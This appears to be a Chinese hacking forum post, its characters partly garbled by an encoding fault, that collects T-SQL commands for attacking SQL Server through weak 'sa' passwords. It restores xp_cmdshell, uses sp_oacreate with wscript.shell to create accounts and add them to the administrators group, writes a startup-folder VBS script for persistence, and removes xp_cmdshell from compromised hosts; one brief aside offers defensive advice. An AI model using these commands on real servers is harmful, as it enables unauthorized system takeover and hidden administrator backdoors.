SA入侵時(shí)候刪除CMDSHELL的經(jīng)典回答集合（100%成功）

入侵的時(shí)候遇到了。 就給大家總結(jié)了以后發(fā)布出來(lái)了。

用這些命令恢復(fù)一下xp_cmdshell

開啟cmdshell的SQL語(yǔ)句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判斷存儲(chǔ)擴(kuò)展是否存在

Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

返回結(jié)果為1就OK

恢復(fù)xp_cmdshell

Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

返回結(jié)果為1就OK

否則上傳xplog7.0.dll

Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'

掃到SQL弱口令后利用SQLTOOLS出現(xiàn)未能找到存儲(chǔ)過(guò)程 'master..xp_cmdshell'

這種情況的主要原因是刪除了擴(kuò)展存儲(chǔ)過(guò)過(guò)程xp_cmdshell， 有一個(gè)恢復(fù)的辦法， 如果不成功說(shuō)明被改名了

使用SQLTOOLS連接， 連接后在利用目錄下點(diǎn)執(zhí)行數(shù)據(jù)庫(kù)命令， 執(zhí)行：

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

運(yùn)氣好的話就成功了， 如果你想讓你的肉雞用SQL執(zhí)行不了DOS命令的話， 執(zhí)行：

sp_dropextendedproc "xp_cmdshell"

就執(zhí)行不了DOS命令了， 當(dāng)然用上面的語(yǔ)句可以復(fù)原。

用SQLTOOLS可以連接成功， 執(zhí)行DOS命令， 卻總是顯示這個(gè)、、、拒絕了對(duì)對(duì)象 'xp_cmdshell'（數(shù)據(jù)庫(kù) 'master'， 所有者 'dbo'）的 EXECUTE 權(quán)限。

怎么解決？？？？

上傳文件也不行。 。 。

1 未能找到存儲(chǔ)過(guò)程'master..xpcmdshell'。

恢復(fù)方法：查詢分離器連接后，

第一步執(zhí)行：EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

第二步執(zhí)行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然后按F5鍵命令執(zhí)行完畢。

2 無(wú)法裝載 DLL xpsql70.dll 或該DLL所引用的某一DLL。 原因126（找不到指定模塊。 ）

恢復(fù)方法：查詢分離器連接后，

第一步執(zhí)行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

第二步執(zhí)行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然后按F5鍵命令執(zhí)行完畢。

3 無(wú)法在庫(kù) xpweb70.dll 中找到函數(shù) xp_cmdshell。 原因: 127(找不到指定的程序。 )

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行：exec sp_dropextendedproc 'xp_cmdshell'

第二步執(zhí)行：exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5鍵命令執(zhí)行完畢。

四.終極方法：

如果以上方法均不可恢復(fù)， 請(qǐng)嘗試用下面的辦法直接添加帳戶：

查詢分離器連接后，

2000servser系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output

exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用戶 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用戶 /add'

xp或2003server系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用戶 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用戶 /add'

還不行就沒(méi)辦法了

方法1:查詢分離器連接后執(zhí)行：

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

然后按F5鍵命令執(zhí)行完畢

方法2:查詢分離器連接后

第一步執(zhí)行：use master

第二步執(zhí)行：sp_dropextendedproc 'xp_cmdshell' 然后按F5鍵命令執(zhí)行完畢

1 未能找到存儲(chǔ)過(guò)程'master..xpcmdshell'. 恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

第二步執(zhí)行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5鍵命令執(zhí)行完畢

2 無(wú)法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。 原因126（找不到指定模塊。 ）

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行：sp_dropextendedproc "xp_cmdshell"

第二步執(zhí)行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'然后按F5鍵命令執(zhí)行完畢

3 無(wú)法在庫(kù) xpweb70.dll 中找到函數(shù) xp_cmdshell。 原因: 127(找不到指定的程序。 )

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行:exec sp_dropextendedproc 'xp_cmdshell'

第二步執(zhí)行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5鍵命令執(zhí)行完畢

四.終極方法.如果以上方法均不可恢復(fù),請(qǐng)嘗試用下面的辦法直接添加帳戶:

1,查詢分離器連接后,

2000servser系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user yszar andylau /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators yszar /add'

xp或2003server系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用戶名 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用戶名 /add'

或者可以

declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX為你要執(zhí)行的命令

有時(shí)候用查詢分離器連接執(zhí)行以上語(yǔ)句的時(shí)候會(huì)出現(xiàn)找不到存儲(chǔ)過(guò)程 sp_addextendedproc

解決方法:

create procedure sp_addextendedproc --- 1996/08/30 20:13

@functname nvarchar(517),/* (owner.)name of function to call */

@dllname varchar(255)/* name of DLL containing function */

as

set implicit_transactions off

if @@trancount > 0

begin

raiserror(15002,-1,-1,'sp_addextendedproc')

return (1)

end

dbcc addextendedproc( @functname, @dllname)

return (0) -- sp_addextendedproc

GO

這段代碼貼入查詢分離器,執(zhí)行

1.突破xplog70.dll

declare @cmd INT

exec sp_oacreate 'wscript.shell',@cmd output

exec sp_oamethod @cmd,'run',null,'net user 用戶名 密碼 /add','0','true'

declare @cmd INT

exec sp_oacreate 'wscript.shell',@cmd output

exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用戶名 /add','0','true'

2.恢復(fù)xp_cmdshell

先嘗試恢復(fù)xp_cmdshell， sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'，

結(jié)果發(fā)現(xiàn)xpsql70.dll被刪除。

然后寫vbs文件到啟動(dòng)組里面：

declare @o int, @f int, @t int, @ret int ,@a int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out,

'c:\\docume~1\\alluse~1\\「開始」菜單\\程序\\啟動(dòng)\\a.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,

'set wshshell=createobject("wscript.shell")'

exec @ret = sp_oamethod @f, 'writeline', NULL,

'a=wshshell.run ("cmd.exe /c net user lintao lintao520 /add",0)'

exec @ret = sp_oamethod @f, 'writeline', NULL,

'b=wshshell.run ("cmd.exe /c net localgroup administrators lintao /add",0)'

3.去除SA的xp_cmdshell權(quán)限

如果你不需要擴(kuò)展存儲(chǔ)過(guò)程xp_cmdshell請(qǐng)把它去掉。 使用這個(gè)SQL語(yǔ)句：

use master

sp_dropextendedproc 'xp_cmdshell'

xp_cmdshell是進(jìn)入操作系統(tǒng)的最佳捷徑， 是數(shù)據(jù)庫(kù)留給操作系統(tǒng)的一個(gè)大后門。 如果你需要這個(gè)存儲(chǔ)過(guò)程， 請(qǐng)用這個(gè)語(yǔ)句也可以恢復(fù)過(guò)來(lái)。

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

4.上傳xplog7.0.dll：

exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'